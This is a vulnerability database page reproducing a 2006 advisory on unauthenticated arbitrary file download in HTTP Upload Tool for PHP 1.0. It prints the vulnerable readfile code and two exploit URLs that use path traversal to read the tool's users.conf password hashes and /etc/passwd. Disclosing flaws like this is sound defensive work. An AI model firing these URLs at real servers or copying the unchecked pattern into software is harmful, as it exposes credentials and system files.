Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15142
HistoryNov 18, 2006 - 12:00 a.m.

HTTP Upload Tool (download.php) Information Disclosure Vulnerability

2006-11-1800:00:00
vulners.com
7
JSON

#######################################################################################

Target:

HTTP Upload Tool For PHP 1.0

http://uploadtool.sourceforge.net/

Vulnerability:

Information disclosure

Description:

The download.php file in Upload Tool for PHP neither verifies that a

requestor has authenticated, nor performs any sanity checking on the file

being requested. This allows an unauthenticated user to download any file

which the web server has read rights to, including the users.conf file which

contains a list of Upload Tool's users and their hashed passwords.

Vulnerable Code (truncated):

$filename = $_GET['filename'];

readfile("$filename");

Exploit:

http://www.examplesite.com/upload/bin/download.php?filename=../conf/users.conf

http://www.examplesite.com/upload/bin/download.php?filename=/etc/passwd

Discovered:

Craig Heffner

heffnercj [at] gmail.com

http://www.craigheffner.com

#######################################################################################

milw0rm.com [2006-11-16]

JSON